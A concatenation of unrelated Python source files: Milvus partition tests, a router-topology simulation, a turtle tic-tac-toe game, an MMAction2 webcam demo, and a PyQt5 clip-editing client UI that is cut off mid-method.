except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
network_protocol.py | import numpy as np
import enum
import time
from threading import Thread
import topology as topology_class
class MsgType(enum.Enum):
NEIGHBORS = enum.auto()
GET_TOPOLOGY = enum.auto()
SET_TOPOLOGY = enum.auto()
OFF = enum.auto()
PRINT_WAYS = enum.auto()
class Message:
def __init__(self):
self.data = None
self.type = None
def __str__(self):
return f"({self.type}: {self.data})"
class Connection:
def __init__(self):
self.right_queue = []
self.left_queue = []
def __str__(self):
return f"(->:{self.right_queue}\n<-:{self.right_queue})"
@staticmethod
def __get_message(queue, ):
if len(queue) > 0:
result = queue[0]
queue.pop(0)
return result
else:
return None
def get_message(self, direction=0):
if direction == 0:
res = self.__get_message(self.right_queue)
return res
else:
res = self.__get_message(self.left_queue)
return res
def send_message(self, message, direction=0):
if direction == 0:
self.left_queue.append(message)
return
else:
self.right_queue.append(message)
return
class Router:
def __init__(self, conn, index):
self.DR_connection = conn
self.topology = topology_class.Topology()
self.shortest_roads = None
self.index = index
self.neighbors = []
def print_shortest_ways(self):
shortest_ways = self.topology.get_shortest_ways(self.index)
print(f"{self.index}: {shortest_ways}\n", end="")
def send_neighbors(self):
msg = Message()
msg.type = MsgType.NEIGHBORS
msg.data = self.neighbors.copy()
self.DR_connection.send_message(msg)
def get_topology(self):
msg = Message()
msg.type = MsgType.GET_TOPOLOGY
self.DR_connection.send_message(msg)
def router_start(self):
self.send_neighbors()
self.get_topology()
def router_off(self):
msg = Message()
msg.type = MsgType.OFF
self.DR_connection.send_message(msg)
def add_node(self, index, neighbors):
# print(f".{index}.")
self.topology.add_new_node(index)
for j in neighbors:
self.topology.add_new_link(index, j)
def delete_node(self, index):
self.topology.delete_node(index)
def proc_message(self):
input_msg = self.DR_connection.get_message()
if input_msg is None:
return
print(f"r({self.index}) : {input_msg}\n", end="")
if input_msg.type == MsgType.NEIGHBORS:
index = input_msg.data["index"]
neighbors = input_msg.data["neighbors"]
self.add_node(index, neighbors)
elif input_msg.type == MsgType.SET_TOPOLOGY:
new_topology = input_msg.data
self.topology = new_topology
elif input_msg.type == MsgType.OFF:
index = input_msg.data
self.delete_node(index)
elif input_msg.type == MsgType.PRINT_WAYS:
self.print_shortest_ways()
else:
print("DR: unexpected msf type:", input_msg.type)
class DesignatedRouter:
def __init__(self):
self.connections = []
self.topology = topology_class.Topology()
def add_connection(self):
new_connection = Connection()
new_index = len(self.connections)
self.connections.append(new_connection)
return new_connection, new_index
def add_node(self, index, neighbors):
self.topology.add_new_node(index)
for j in neighbors:
self.topology.add_new_link(index, j)
def delete_node(self, index):
self.topology.delete_node(index)
def send_all_exclude_one(self, exclude_index, msg):
for conn_ind in range(len(self.connections)):
conn = self.connections[conn_ind]
if conn is None:
continue
if conn_ind == exclude_index:
continue
conn.send_message(msg, 1)
def proc_msg_neighbors(self, conn_ind, input_msg):
self.add_node(conn_ind, input_msg.data)
msg = Message()
msg.type = MsgType.NEIGHBORS
msg.data = {"index": conn_ind,
"neighbors": input_msg.data
}
self.send_all_exclude_one(conn_ind, msg)
def proc_msg_off(self, conn_ind, input_msg):
self.delete_node(conn_ind)
msg = Message()
msg.type = MsgType.OFF
msg.data = conn_ind
self.send_all_exclude_one(conn_ind, msg)
def print_shortest_ways(self):
msg = Message()
msg.type = MsgType.PRINT_WAYS
for conn in self.connections:
conn.send_message(msg, 1)
def proc_message(self):
for conn_ind in range(len(self.connections)):
conn = self.connections[conn_ind]
if conn is None:
continue
input_msg = conn.get_message(1)
if input_msg is None:
continue
print(f"dr({conn_ind}): {input_msg}\n", end="")
if input_msg.type == MsgType.NEIGHBORS:
self.proc_msg_neighbors(conn_ind, input_msg)
elif input_msg.type == MsgType.GET_TOPOLOGY:
msg = Message()
msg.type = MsgType.SET_TOPOLOGY
msg.data = self.topology.copy()
conn.send_message(msg, 1)
elif input_msg.type == MsgType.OFF:
self.proc_msg_off(conn_ind, input_msg)
else:
print("DR: unexpected msf type:", input_msg.type)
designed_router: DesignatedRouter = None
stop_flag = False
printer_flag = False
blink_conn_arr = []
def router_run(neighbors):
global designed_router
global blink_conn_arr
conn, index = designed_router.add_connection()
router = Router(conn, index)
router.neighbors = neighbors.copy()
router.router_start()
while True:
router.proc_message()
if blink_conn_arr[router.index]:
router.router_off()
time.sleep(2)
router.router_start()
blink_conn_arr[router.index] = False
if stop_flag:
break
def designed_router_run():
global designed_router
global printer_flag
designed_router = DesignatedRouter()
while True:
designed_router.proc_message()
if printer_flag:
designed_router.print_shortest_ways()
printer_flag = False
if stop_flag:
break
def stopper():
global stop_flag
time.sleep(10)
stop_flag = True
def printer():
global printer_flag
while True:
time.sleep(1)
printer_flag = True
if stop_flag:
break
def connections_breaker():
global blink_conn_arr
time.sleep(2)
threshold = 0.5
while True:
time.sleep(0.01)
val = np.random.rand()
if val >= threshold:
index = np.random.randint(0, len(blink_conn_arr))
blink_conn_arr[index] = True
time.sleep(2)
if stop_flag:
break
def simulate(nodes, neighbors):
global blink_conn_arr
dr_thread = Thread(target=designed_router_run, args=())
node_threads = [Thread(target=router_run, args=(neighbors[i],)) for i in range(len(nodes))]
blink_conn_arr = [False for i in range(len(nodes))]
dr_thread.start()
for i in range(len(nodes)):
node_threads[i].start()
printer_thread = Thread(target=printer, args=())
conn_breaker_thread = Thread(target=connections_breaker, args=())
conn_breaker_thread.start()
printer_thread.start()
time.sleep(5)
global stop_flag
stop_flag = True
for i in range(len(nodes)):
node_threads[i].join()
dr_thread.join()
|
tictactoe.py | """Tic Tac Toe
Exercises
1. Give the X and O a different color and width.
2. What happens when someone taps a taken spot?
3. How would you detect when someone has won?
4. How could you create a computer player?
"""
from turtle import *
from freegames import line
from threading import Thread
from playsound import playsound
import time
# Función para abrir archivo de música
def music_func():
playsound('Beep.mp3')
# Definir función que llama audio
music = Thread(target=music_func)
music.daemon = True
music2 = Thread(target=music_func)
music2.daemon = True
# Iniciar musica
music.start()
def grid():
"Draw tic-tac-toe grid."
line(-67, 200, -67, -200)
line(67, 200, 67, -200)
line(-200, -67, 200, -67)
line(-200, 67, 200, 67)
def drawx(x, y):
"Draw X player."
line(x, y, x + 133, y + 133)
line(x, y + 133, x + 133, y)
def drawo(x, y):
"Draw O player."
up()
goto(x + 67, y + 5)
down()
circle(62)
def floor(value):
"Round value down to grid with square size 133."
return ((value + 200) // 133) * 133 - 200
state = {'player': 0}
players = [drawx, drawo]
def tap(x, y):
"Draw X or O in tapped square."
x = floor(x)
y = floor(y)
player = state['player']
draw = players[player]
draw(x, y)
update()
tiempo=1
while tiempo:
m, s = divmod(tiempo, 60)
min_sec_format = '{:02d}:{:02d}'.format(m, s)
print(min_sec_format, end='/r')
time.sleep(1)
tiempo -= 1
music_func()
state['player'] = not player
setup(420, 420, 370, 0)
hideturtle()
tracer(False)
grid()
update()
onscreenclick(tap)
done()
|
webcam_demo.py | import argparse
import time
from collections import deque
from operator import itemgetter
from threading import Thread
import cv2
import numpy as np
import torch
from mmcv import Config, DictAction
from mmcv.parallel import collate, scatter
from mmaction.apis import init_recognizer
from mmaction.datasets.pipelines import Compose
FONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL
FONTSCALE = 1
FONTCOLOR = (255, 255, 255) # BGR, white
MSGCOLOR = (128, 128, 128) # BGR, gray
THICKNESS = 1
LINETYPE = 1
EXCLUED_STEPS = [
'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',
'PyAVDecode', 'RawFrameDecode', 'FrameSelector'
]
def parse_args():
parser = argparse.ArgumentParser(description='MMAction2 webcam demo')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', help='checkpoint file')
parser.add_argument('label', help='label file')
parser.add_argument(
'--device', type=str, default='cuda:0', help='CPU/CUDA device option')
parser.add_argument(
'--camera-id', type=int, default=0, help='camera device id')
parser.add_argument(
'--threshold',
type=float,
default=0.01,
help='recognition score threshold')
parser.add_argument(
'--average-size',
type=int,
default=1,
help='number of latest clips to be averaged for prediction')
parser.add_argument(
'--drawing-fps',
type=int,
default=20,
help='Set upper bound FPS value of the output drawing')
parser.add_argument(
'--inference-fps',
type=int,
default=4,
help='Set upper bound FPS value of model inference')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
default={},
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. For example, '
"'--cfg-options model.backbone.depth=18 model.backbone.with_cp=True'")
args = parser.parse_args()
assert args.drawing_fps >= 0 and args.inference_fps >= 0, \
'upper bound FPS value of drawing and inference should be set as ' \
'positive number, or zero for no limit'
return args
def show_results():
print('Press "Esc", "q" or "Q" to exit')
text_info = {}
cur_time = time.time()
while True:
msg = 'Waiting for action ...'
ret, frame = camera.read()
frame_queue.append(np.array(frame[:, :, ::-1]))
if len(result_queue) != 0:
text_info = {}
results = result_queue.popleft()
for i, result in enumerate(results):
selected_label, score = result
if score < threshold:
break
location = (0, 40 + i * 20)
text = selected_label + ': ' + str(round(score, 2))
text_info[location] = text
cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
FONTCOLOR, THICKNESS, LINETYPE)
elif len(text_info):
for location, text in text_info.items():
cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
FONTCOLOR, THICKNESS, LINETYPE)
else:
cv2.putText(frame, msg, (0, 40), FONTFACE, FONTSCALE, MSGCOLOR,
THICKNESS, LINETYPE)
cv2.imshow('camera', frame)
ch = cv2.waitKey(1)
if ch == 27 or ch == ord('q') or ch == ord('Q'):
break
if drawing_fps > 0:
# add a limiter for actual drawing fps <= drawing_fps
sleep_time = 1 / drawing_fps - (time.time() - cur_time)
if sleep_time > 0:
time.sleep(sleep_time)
cur_time = time.time()
def inference():
score_cache = deque()
scores_sum = 0
cur_time = time.time()
while True:
cur_windows = []
while len(cur_windows) == 0:
if len(frame_queue) == sample_length:
cur_windows = list(np.array(frame_queue))
if data['img_shape'] is None:
data['img_shape'] = frame_queue.popleft().shape[:2]
cur_data = data.copy()
cur_data['imgs'] = cur_windows
cur_data = test_pipeline(cur_data)
cur_data = collate([cur_data], samples_per_gpu=1)
if next(model.parameters()).is_cuda:
cur_data = scatter(cur_data, [device])[0]
with torch.no_grad():
scores = model(return_loss=False, **cur_data)[0]
score_cache.append(scores)
scores_sum += scores
if len(score_cache) == average_size:
scores_avg = scores_sum / average_size
num_selected_labels = min(len(label), 5)
scores_tuples = tuple(zip(label, scores_avg))
scores_sorted = sorted(
scores_tuples, key=itemgetter(1), reverse=True)
results = scores_sorted[:num_selected_labels]
result_queue.append(results)
scores_sum -= score_cache.popleft()
if inference_fps > 0:
# add a limiter for actual inference fps <= inference_fps
sleep_time = 1 / inference_fps - (time.time() - cur_time)
if sleep_time > 0:
time.sleep(sleep_time)
cur_time = time.time()
camera.release()
cv2.destroyAllWindows()
def main():
global frame_queue, camera, frame, results, threshold, sample_length, \
data, test_pipeline, model, device, average_size, label, \
result_queue, drawing_fps, inference_fps
args = parse_args()
average_size = args.average_size
threshold = args.threshold
drawing_fps = args.drawing_fps
inference_fps = args.inference_fps
device = torch.device(args.device)
cfg = Config.fromfile(args.config)
cfg.merge_from_dict(args.cfg_options)
model = init_recognizer(cfg, args.checkpoint, device=device)
camera = cv2.VideoCapture(args.camera_id)
data = dict(img_shape=None, modality='RGB', label=-1)
with open(args.label, 'r') as f:
label = [line.strip() for line in f]
# prepare test pipeline from non-camera pipeline
cfg = model.cfg
sample_length = 0
pipeline = cfg.data.test.pipeline
pipeline_ = pipeline.copy()
for step in pipeline:
if 'SampleFrames' in step['type']:
sample_length = step['clip_len'] * step['num_clips']
data['num_clips'] = step['num_clips']
data['clip_len'] = step['clip_len']
pipeline_.remove(step)
if step['type'] in EXCLUED_STEPS:
# remove step to decode frames
pipeline_.remove(step)
test_pipeline = Compose(pipeline_)
assert sample_length > 0
try:
frame_queue = deque(maxlen=sample_length)
result_queue = deque(maxlen=1)
pw = Thread(target=show_results, args=(), daemon=True)
pr = Thread(target=inference, args=(), daemon=True)
pw.start()
pr.start()
pw.join()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
clientUI.py | from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5 import QtWidgets
from PyQt5.QtCore import *
from PyQt5 import QtGui
from pymediainfo import MediaInfo
from PyQt5.QtGui import QIcon
import cv2
from PyQt5.QtMultimedia import QMediaPlayer, QMediaPlaylist, QMediaContent
from PyQt5.QtCore import QDir, Qt, QUrl, pyqtSignal, QPoint, QRect, QObject
from PyQt5.QtMultimedia import QMediaContent, QMediaPlayer, QVideoFrame, QAbstractVideoSurface, QAbstractVideoBuffer, QVideoSurfaceFormat
import client
from PyQt5.QtWidgets import *
import scriptwrapper
import pickle
from threading import Thread
import settings
import os
games = None
moreClips = None
selected_game = ''
current_path = os.path.dirname(os.path.realpath(__file__))
class LoginWindow(QMainWindow):
def __init__(self):
QtWidgets.QWidget.__init__(self)
uic.loadUi(f"{current_path}/UI/login.ui", self)
try:
self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
except Exception as e:
pass
self.password.setEchoMode(QtWidgets.QLineEdit.Password)
if settings.autoLogin:
self.autoLogin.setChecked(True)
self.username.setText(settings.FTP_USER)
self.password.setText(settings.FTP_PASSWORD)
self.login.clicked.connect(self.attemptLogin)
def attemptLogin(self):
username = self.username.text()
password = self.password.text()
success = client.testFTPConnection(username, password)
if success:
self.loginSuccess()
else:
self.loginMessage.setText("Incorrect username or password")
def loginSuccess(self):
self.menu = MainMenu()
self.menu.show()
client.mainMenuWindow = self.menu
self.close()
class MainMenu(QMainWindow):
update_progress_bar = pyqtSignal(int)
finish_downloading = pyqtSignal()
download_finished_videos_names = pyqtSignal(list)
update_render_progress = pyqtSignal(dict)
def __init__(self):
QtWidgets.QWidget.__init__(self)
uic.loadUi(f"{current_path}/UI/menu.ui", self)
try:
self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
except Exception as e:
pass
self.welcomeMessage.setText("Welcome %s!" % settings.FTP_USER)
self.editVideo.clicked.connect(self.startEditingVideo)
self.openVideos.clicked.connect(self.openDownloadLocation)
self.refreshFinishedVideos.clicked.connect(self.getFinishedVideos)
self.downloadSingle.clicked.connect(self.downloadFinishedVideo)
self.getFinishedVideos()
self.progressBar.setMaximum(2)
self.update_progress_bar.connect(self.updateDownload)
self.finish_downloading.connect(self.finishDownloading)
self.update_render_progress.connect(self.updateRenderProgress)
self.download_finished_videos_names.connect(self.populateFinishedVideos)
def updateRenderProgress(self, dictionary):
max_progress = dictionary["max_progress"]
current_progress = dictionary["current_progress"]
render_message = dictionary["render_message"]
if max_progress is not None:
self.renderProgress.setMaximum(max_progress)
if current_progress is not None:
self.renderProgress.setValue(current_progress)
self.renderMessage.setText(render_message)
def downloadFinishedVideo(self):
self.downloadSingle.setEnabled(False)
self.progressBar.setValue(0)
name = self.finishedVidSelect.currentText()
Thread(target=client.downloadFinishedVideo, args=(name, self)).start()
def populateFinishedVideos(self, names):
self.finishedVidSelect.clear()
names.reverse()
self.finishedVidSelect.addItems(names)
self.downloadSingle.setEnabled(True)
self.completedVideos.setText("%s Completed Videos" % len(names))
def getFinishedVideos(self):
self.downloadSingle.setEnabled(False)
Thread(target=client.requestFinishedVideoList, args=(self,)).start()
def startEditingVideo(self):
self.download_menu = ClipDownloadMenu()
self.download_menu.show()
client.mainMenuWindow = self
self.close()
def updateDownload(self, number):
self.progressBar.setValue(number)
def finishDownloading(self):
self.downloadSingle.setEnabled(True)
self.openDownloadLocation()
def openDownloadLocation(self):
os.startfile("Finished Videos")
# options = QFileDialog.Options()
# fileName, _ = QFileDialog.getOpenFileName(self,"Select The First Clip", f"Finished Videos/","All Files (*);;MP4 Files (*.mp4)", options=options)
class ClipDownloadMenu(QMainWindow):
update_progress_bar = pyqtSignal(int)
set_max_progres_bar = pyqtSignal(int)
finished_downloading = pyqtSignal(scriptwrapper.ScriptWrapper)
def __init__(self, clipEditorWindow = None):
QtWidgets.QWidget.__init__(self)
uic.loadUi(f"{current_path}/UI/clipDownload.ui", self)
try:
self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
except Exception as e:
pass
self.progressBar.hide()
self.addingToDBLabel.hide()
self.downloadButton.clicked.connect(self.downloadClips)
self.update_progress_bar.connect(self.updateProgressBar)
self.set_max_progres_bar.connect(self.setMaxProgressBar)
self.finished_downloading.connect(self.finishedDownloading)
self.clipEditorWindow = clipEditorWindow
self.populateGames()
def populateGames(self):
self.games.clear()
self.games.addItems(games)
def downloadClips(self):
#Getting all the necessary information for getting the clips
self.downloadButton.hide()
self.addingToDBLabel.show()
self.progressBar.show()
num_clips = str(self.clipNumCombo.currentText())
game = str(self.games.currentText())
already_scripts = None
if self.clipEditorWindow is not None:
already_scripts = self.clipEditorWindow.videoWrapper.scriptWrapper.rawScript
if already_scripts is None:
Thread(target=client.requestClips, args=(game, num_clips, self)).start()
else:
Thread(target=client.requestClipsWithoutClips, args=(game, num_clips, already_scripts, self)).start()
def setMaxProgressBar(self, number):
self.progressBar.setMaximum(number)
def updateProgressBar(self, downloadno):
self.progressBar.setValue(downloadno)
def finishedDownloading(self, newscriptwrapper):
if not len(newscriptwrapper.scriptMap) == 0:
self.close()
if self.clipEditorWindow is None:
twitchvideo = scriptwrapper.TwitchVideo(newscriptwrapper)
self.clipEditor = clipEditor(twitchvideo)
self.clipEditor.show()
else:
self.clipEditorWindow.videoWrapper.scriptWrapper.addScriptWrapper(newscriptwrapper)
self.clipEditorWindow.downloaded_more_scripts.emit()
else:
self.downloadFail("Failure")
self.close()
if self.clipEditorWindow is None:
client.mainMenuWindow.show()
def downloadFail(self, msg):
buttonReply = QMessageBox.information(self, msg, 'No clips able to download. Please try with more clips', QMessageBox.Ok)
class ClipUploadMenu(QMainWindow):
update_progress_bar = pyqtSignal()
set_max_progres_bar = pyqtSignal(int)
finished_downloading = pyqtSignal()
def __init__(self, videowrapper, name):
QtWidgets.QWidget.__init__(self)
uic.loadUi(f"{current_path}/UI/clipUpload.ui", self)
try:
self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
except Exception as e:
pass
self.update_progress_bar.connect(self.updateProgressBar)
self.set_max_progres_bar.connect(self.setMaxProgressBar)
self.finished_downloading.connect(self.finishedDownloading)
Thread(target=client.exportVideo, args=(videowrapper, name, self)).start()
self.i = 0
def setMaxProgressBar(self, number):
self.progressBar.setMaximum(number)
def updateProgressBar(self):
self.i += 1
self.progressBar.setValue(self.i)
def finishedDownloading(self):
self.close()
self.mainMenu = MainMenu()
self.mainMenu.show()
client.mainMenuWindow = self.mainMenu
class clipEditor(QMainWindow):
downloaded_more_scripts = pyqtSignal()
def __init__(self, videoWrapper):
QtWidgets.QWidget.__init__(self)
uic.loadUi(f"{current_path}/UI/ClipEditor.ui", self)
try:
self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
except Exception as e:
pass
#Variables and stuff for the editor to send to the video generator
self.videoWrapper = videoWrapper
self.mainCommentIndex = 0
self.populateTreeWidget()
self.treeWidget.currentItemChanged.connect(self.setSelection)
self.treeWidget.clicked.connect(self.setSelection)
self.downloaded_more_scripts.connect(self.receiveMoreClips)
self.introClipPath = None
self.firstClipPath = None
self.intervalClipPath = None
self.outroClipPath = None
self.keep = []
#All of the stuff to make the clip editor work
self.playlist = QMediaPlaylist()
vid_path = QUrl.fromLocalFile(f'{current_path}/VideoFiles')
self.mediaPlayer = QMediaPlayer()
self.playPauseButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))
#self.addClipsToPlaylist()
self.mediaPlayer.stateChanged.connect(self.playPauseMedia)
self.mediaPlayer.setVideoOutput(self.clipPlayer)
self.mediaPlayer.setPlaylist(self.playlist)
self.mediaPlayer.positionChanged.connect(self.positionChanged)
self.mediaPlayer.durationChanged.connect(self.durationChanged)
self.videoDurationSlider.sliderMoved.connect(self.setPosition)
self.defaultIntro.stateChanged.connect(self.defaultIntroToggle)
self.chooseFirstClip.clicked.connect(self.firstClipFileDialog)
self.chooseIntro.clicked.connect(self.introFileDialog)
self.chooseInterval.clicked.connect(self.intervalFileDialog)
self.chooseOutro.clicked.connect(self.outroFileDialog)
self.timer = QTimer(self, interval=1)
self.timer.start()
self.mediaPlayer.positionChanged.connect(self.vidTimeStamp)
self.playPauseButton.clicked.connect(self.play)
self.skipButton.clicked.connect(self.skipComment)
self.downloadMore.clicked.connect(self.downloadMoreScripts)
self.keepButton.clicked.connect(self.keepComment)
self.exportButton.clicked.connect(self.videoExportConfirmation)
self.moveDown.clicked.connect(self.moveClipDown)
self.moveUp.clicked.connect(self.moveClipUp)
#self.nextButton.clicked.connect(self.nextClip)
self.playlist.currentIndexChanged.connect(self.checkForLastClip)
if settings.enforceInterval:
self.loadDefaultInterval()
else:
self.chooseInterval.hide()
self.defaultInterval.hide()
if settings.enforceIntro:
self.loadDefaultIntro()
else:
self.chooseIntro.hide()
self.defaultIntro.hide()
if settings.enforceOutro:
self.loadDefaultOutro()
else:
self.chooseOutro.hide()
self.defaultOutro.hide()
if not settings.enforceFirstClip:
self.chooseFirstClip.hide()
self.firstClipCred.hide()
self.firstClipNameLabel.hide()
self.updateDisplay()
def muteBackgroundVolume(self):
self.backgroundVolume.setText("0")
def defaultIntroToggle(self):
print(self.defaultIntro.isChecked())
def receiveMoreClips(self):
self.populateTreeWidget()
def downloadMoreScripts(self):
self.gameSelect = ClipDownloadMenu(self)
self.gameSelect.show()
pass
def moveClipDown(self):
self.videoWrapper.scriptWrapper.moveUp(self.mainCommentIndex)
self.updateDisplay()
def moveClipUp(self):
self.videoWrapper.scriptWrapper.moveDown(self.mainCommentIndex)
self.updateDisplay()
def updateDisplay(self):
#self.scriptWrapper.saveScriptWrapper()
self.getCurrentWidget(self.mainCommentIndex).setForeground(0, QtGui.QBrush(QtGui.QColor("blue")))
twitchclip = self.videoWrapper.scriptWrapper.getCommentInformation(self.mainCommentIndex)
mp4file = twitchclip.mp4
video_duration = twitchclip.vid_duration
audio = twitchclip.audio
self.clipTitle.setText(f'{twitchclip.author_name}-{twitchclip.clip_name}')
self.likeCount.setText("Likes: %s" % twitchclip.diggCount)
self.shareCount.setText("Shares: %s" % twitchclip.shareCount)
self.playCount.setText("Plays: %s" % twitchclip.playCount)
self.commentCount.setText("Comments: %s" % twitchclip.commentCount)
self.updateClipDuration()
self.mediaPlayer.stop()
if len(mp4file.split("/")) > 2:
self.mediaPlayer.setMedia(QMediaContent(QUrl.fromLocalFile(f'{current_path}/{mp4file}')));
else:
self.mediaPlayer.setMedia(QMediaContent(QUrl.fromLocalFile(f'{current_path}/TempClips/{mp4file}.mp4')))
self.mediaPlayer.setVolume(audio * 100)
self.estTime.setText(str(self.videoWrapper.scriptWrapper.getEstimatedVideoTime()))
self.videoLength.setText(f'{round(video_duration, 1)}')
self.mediaPlayer.play()
self.clipCountLabel.setText(f"Clip {self.mainCommentIndex+1}/{len(self.videoWrapper.scriptWrapper.rawScript)}")
def setSelection(self):
try:
self.currentTreeWidget = self.treeWidget.currentItem()
if self.currentTreeWidget.parent() is None:
self.mainCommentIndex = int(str(self.currentTreeWidget.text(0)).split(" ")[1])
self.updateColors()
self.updateDisplay()
except Exception:
print("error trying to update selection index")
def getCurrentWidget(self, x):
return self.getTopLevelByName("Vid %s" % str(x))
def incrimentSelection(self):
if not self.mainCommentIndex + 1 > self.videoWrapper.scriptWrapper.getCommentAmount() - 1:
self.mainCommentIndex += 1
def updateColors(self):
for x, mainComment in enumerate(self.videoWrapper.scriptWrapper.scriptMap):
self.selectedMainComment = self.getTopLevelByName("Vid %s" % str(x))
if mainComment is True:
self.selectedMainComment.setForeground(0, QtGui.QBrush(QtGui.QColor("green")))
else:
self.selectedMainComment.setForeground(0, QtGui.QBrush(QtGui.QColor("red")))
def keepComment(self):
self.videoWrapper.scriptWrapper.keep(self.mainCommentIndex)
self.incrimentSelection()
self.updateColors()
self.updateDisplay()
def skipComment(self):
self.videoWrapper.scriptWrapper.skip(self.mainCommentIndex)
self.updateColors()
self.nextMainComment()
self.updateDisplay()
def nextMainComment(self):
if not self.mainCommentIndex + 1 > self.videoWrapper.scriptWrapper.getCommentAmount() - 1:
self.mainCommentIndex += 1
self.selectedMainComment = self.getTopLevelByName("Main Comment %s" % str(self.mainCommentIndex))
def populateTreeWidget(self):
self.treeWidget.clear()
for i, clip in enumerate(self.videoWrapper.scriptWrapper.rawScript):
treeParentName = "Vid %s"%str(i)
self.addTopLevel(treeParentName)
self.selectedMainComment = self.getTopLevelByName("Vid %s" % str(0))
self.updateColors()
def getTopLevelByName(self, name):
for index in range(self.treeWidget.topLevelItemCount()):
item = self.treeWidget.topLevelItem(index)
if item.text(0) == name:
return item
return None
def addTopLevel(self, name):
if self.getTopLevelByName(name) is None:
QTreeWidgetItem(self.treeWidget, [name])
def checkForLastClip(self):
if self.playlist.currentIndex() == len(self.startCut) - 1:
self.playlist.setPlaybackMode(0)
def updateClipDuration(self):
twitchclip = self.videoWrapper.scriptWrapper.getCommentInformation(self.mainCommentIndex)
#self.clipDurationLabel.setText(f'Clip Duration: {duration}')
#Getting the timestamp for the video player
def vidTimeStamp(self):
self.timeStamp.setText(f"00:{self.getPositionInSecs()}")
#Controlling the play/pause of the videos, kinda obvious
def playPauseMedia(self):
if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
self.playPauseButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPause))
else:
self.playPauseButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))
#Giving the play button function
def play(self):
if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
self.mediaPlayer.pause()
else:
self.mediaPlayer.play()
#This makes the duration slider move with the video
def positionChanged(self, position):
self.videoDurationSlider.setValue(position)
#Sets the range of each slider to the duration of each video
def durationChanged(self, duration):
self.videoDurationSlider.setRange(0, duration)
#This is to control the position of the video in the media player so I can control the video with the duration slider
def setPosition(self, position):
self.mediaPlayer.setPosition(position)
self.mediaPlayer.play()
def introFileDialog(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Select The Intro Clip", f"{current_path}/Intros","All Files (*);;MP4 Files (*.mp4)", options=options)
if fileName:
try:
vid = cv2.VideoCapture(fileName)
height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
if width != int(1920) or height != int(1080):
self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
else:
self.introClipPath = fileName
self.chooseIntro.setText("Reselect Intro")
except Exception as e:
self.uploadFail("Error occured uploading file \n %s" % (e))
def outroFileDialog(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Select The Outro Clip", f"{current_path}/Outros","All Files (*);;MP4 Files (*.mp4)", options=options)
if fileName:
try:
vid = cv2.VideoCapture(fileName)
height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
if int(width) != 1920 or int(height) != 1080:
self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
else:
self.outroClipPath = fileName
self.chooseOutro.setText("Reselect Outro")
except Exception as e:
self.uploadFail("Error occured uploading file \n %s" % (e))
def intervalFileDialog(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Select The Interval Clip", f"{current_path}/Intervals","All Files (*);;MP4 Files (*.mp4)", options=options)
if fileName:
try:
vid = cv2.VideoCapture(fileName)
height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
if int(width) != 1920 or int(height) != 1080:
self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
else:
self.intervalClipPath = fileName
self.chooseInterval.setText("Reselect Interval")
except Exception as e:
self.uploadFail("Error occured uploading file \n %s" % (e))
def firstClipFileDialog(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Select The First Clip", f"{current_path}/FirstClips","All Files (*);;MP4 Files (*.mp4)", options=options)
if fileName:
# name = len(fileName.split("/"))
# self.firstClipPath = (fileName.split("/")[name-1])
try:
vid = cv2.VideoCapture(fileName)
height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
if int(width) != 1920 or int(height) != 1080:
self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
else:
self.firstClipPath = fileName
name = len(self.firstClipPath.split("/"))
new_name = (self.firstClipPath.split("/")[name-1]).replace(".mp4", "")
self.firstClipCred.setText(new_name)
firstClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", "", "", None, 0, 0, 0, 0)
firstClip.author_name = new_name
firstClip.mp4 = self.firstClipPath
firstClip.upload = True
media_info = MediaInfo.parse(self.firstClipPath)
duration = media_info.tracks[0].duration / 1000
firstClip.vid_duration = float(duration)
